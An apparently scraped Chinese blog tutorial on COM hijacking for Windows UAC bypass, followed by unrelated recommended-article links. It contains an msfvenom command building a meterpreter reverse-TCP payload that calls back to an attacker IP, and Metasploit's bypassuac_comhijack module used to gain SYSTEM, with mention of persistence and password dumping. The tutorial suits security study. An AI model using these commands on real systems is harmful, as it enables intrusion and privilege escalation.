什么是com
com是Component Object Model(组件对象模型)的缩写
come是微软公司未来计算机工业的软件生产更符合人类的行为方式开发的一种新的软件开发技术。在com架构下,人们可以开发各种各样的功能专一的组件,
然后将他们安装需要组合起来,构成复杂的应用系统

这里不得不说一下CLSID
CLSID(Class Identifier)全局唯一标识符,CLSID是指windows系统对于不同的应用程序,文件类型,OLE对象,特殊文件夹以及各种系组件分配的一个唯一表示他的ID代码,
用来对其身份的标识和其他对象进行区分
com组件加载的过程

1:HKCU\Software\Classes\CLSID
2:HKCR\CLSID
3:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\shellCompatibility\Objects\只要是调用windowAPI的,在底层上都会调用com组件,window由很多组件组成的,并不是api组成的,api也会调用一些组件,这些组件就是com组件

com组件劫持原理

当进程寻找com组件时,首先会寻找:
HKCU\Software\Classes\CLSID
我们直接在CLSID下面新建一个对象ID,就能够劫持某个进程或多个进程
与dll劫持原理相近,但是com组件的劫持可以拓展很多东西,劫持的目标不一定是一个进程,劫持所需的文件不一定是一个dll,
他可以是一个 .com文件、二进制PE文件、Dll文件、劫持的目标也可以是一个Window API

msf BypassUAC案例

首先生成shellcode,放入win7中执行
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.17.177 LPORT=4444 -f exe > payload.exe


获得监听后,这里我们看到getsystem失败,这时候我们用com劫持bypassUAC

使用bypassuac_comhijack 利用代码,设置监听,但是这里只适用于64位系统
use exploit/windows/local/bypassuac_comhijack
set payload windows/x64/meterpreter/reverse_tcp


设置成功之后,我们运行

run后,他会修改那个注册表,图中{}的部分
然后把这个注册表修改成什么值,图中为我们生成的dll文件,并且上传到目标机器
最后成功获得system
之后就可以提权,维持,抓密码等操作

原理为com组件劫持事件查询器eventvwr.exe或者控制台mmc.exe,将他们的CLSID替换为我们生成的,意思是打开事件查询器(劫持的程序),就会自动调用这个CLSID组件里面的某个注册表项,然后会把注册表项中的dll加载到事件查看器的内存空间。执行了dll中的shellcode,就会反弹回来会话了

COM劫持 BypassUAC相关推荐

  1. (踩坑)劫持CLSID进行bypassuac

    CATALOG 前言 实现 1.条件 2.实现过程 结论 参考文章 前言 我对clsid的理解就是一条命令或者一个程序或者一个文件,有些程序在启动的时候会查询注册表里面的某个clsid,并对其值进行操 ...

  2. dll注入工具_bypassUAC amp;amp; DLL劫持

    0x11 UAC简介 用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制.其原理是通知用户是否对应用程 ...

  3. BypassUAC方式总结

    文章目录 一.利用场景/需求 1.1 UAC介绍 1.2 目的绕过 二.MSF之bypassuac模块提权 2.1 bypassuac模块提权 2.2 bypassuac_injection模块提权 ...

  4. 2345浏览器网址_2345网址导航回应“浏览器主页劫持”丨开发者日报

    1.2345网址导航回应"浏览器主页劫持" "浏览器主页被2345劫持怎么解决?""如何解决浏览器被2345主页劫持的问题?"--在网民吐槽 ...

  5. 首例利用智能路由网关犯罪嫌疑人被捕:罪名流量劫持

    首例利用智能路由网关犯罪嫌疑人被捕:罪名流量劫持 https://tech.sina.cn/digi/nb/2018-05-15/detail-ihapkuvm0295695.d.html 上海市徐汇 ...

  6. ICANN敦促业界使用DNSSEC,应对DNS劫持攻击

    HTTPS加密 可以有效帮助服务器应对DNS欺骗.DNS劫持.ARP攻击等安全威胁.DNS是什么?DNS如何被利用?HTTPS如何防止DNS欺骗? DNS如何工作? 如果您想访问www.example ...

  7. 如何让网页不受电信114劫持

    每当出现输入网页错误时,电信总会把你劫持到他所在的网页下,如下: [url]http://game1.zj.vnet.cn/url1.php?MT=www.dsdsddsds.com[/url] 看了 ...

  8. 注意!Linux glibc再曝漏洞,可导致Linux软件劫持

    2019独角兽企业重金招聘Python工程师标准>>> glibc是GNU发布的libc库,即c运行库.它是Linux系统中最底层的API,几乎其它运行库都会依赖于glibc. 近日 ...

  9. 百度快照被劫持跳转的解决办法

    2019独角兽企业重金招聘Python工程师标准>>> 哥们的网站流量突然下降的很厉害,从原先一天500左右的IP,直接下降到80左右的IP,让我帮忙看看,网站到底哪里出了问题,首先 ...

最新文章

  1. 被吴恩达的Landing.ai刷屏后,我们从他的8条Twitter和9大招聘岗位中看到了三个有趣细节
  2. redis 实现分布式锁
  3. http请求在asp.net中的应用
  4. 机器学习实战(用Scikit-learn和TensorFlow进行机器学习)(二)
  5. virsh 关机_kvm虚拟机不能使用virsh shutdownw命令关闭虚拟机的解决方法
  6. ASP.NET站点跨子域名单点登陆(SSO)的实现
  7. 【算法系列之十一】k个一组翻转链表
  8. 开启协程_「科普」什么是协程?
  9. android sudio提示快捷键冲突解决
  10. 老外用的文件服务器,云存储服务市场乱战 老外到底都用啥
  11. linux编辑查看命令,Linux的文本编辑和文本内容查看命令
  12. MLOps- 吴恩达Andrew Ng Data Definition and Baseline Week3 实验作业
  13. 【ccpc网络赛】YJJ's Salesman【1010】【树状数组+离散化+dp】
  14. CSDN资源免费下载攻略,手慢无!
  15. 英国内政部(Home Office)间谍机构(spy powers)假装它是Ofcom咨询中的一名私人公民1514378309187...
  16. Mybatis动态sql和缓存
  17. HashMap面试连环炮
  18. 什么是VOLTE(2)
  19. 【算法】分治策略:芯片测试
  20. Ubuntu 7.04--桌面

热门文章

  1. 解决论文查重时参考文献被标红的方法
  2. python之numpy数组的花式索引
  3. 驮运Piggy Back
  4. 通俗理解数学符号 “∫”,“d“,“e”
  5. 你知道什么是微前端吗?微前端和微服务有什么关系?
  6. 一个备库中ORA错误信息的分析 (r6笔记第69天)
  7. 朋友介绍对象加微信后,对方不搭理你的真实原因都在这里面
  8. 十二、Cadence 514 614 Calibre license许可问题
  9. 记一次粗浅的钓鱼样本分析过程
  10. 关于移动支付,美国零售商能从中国这里学到什么?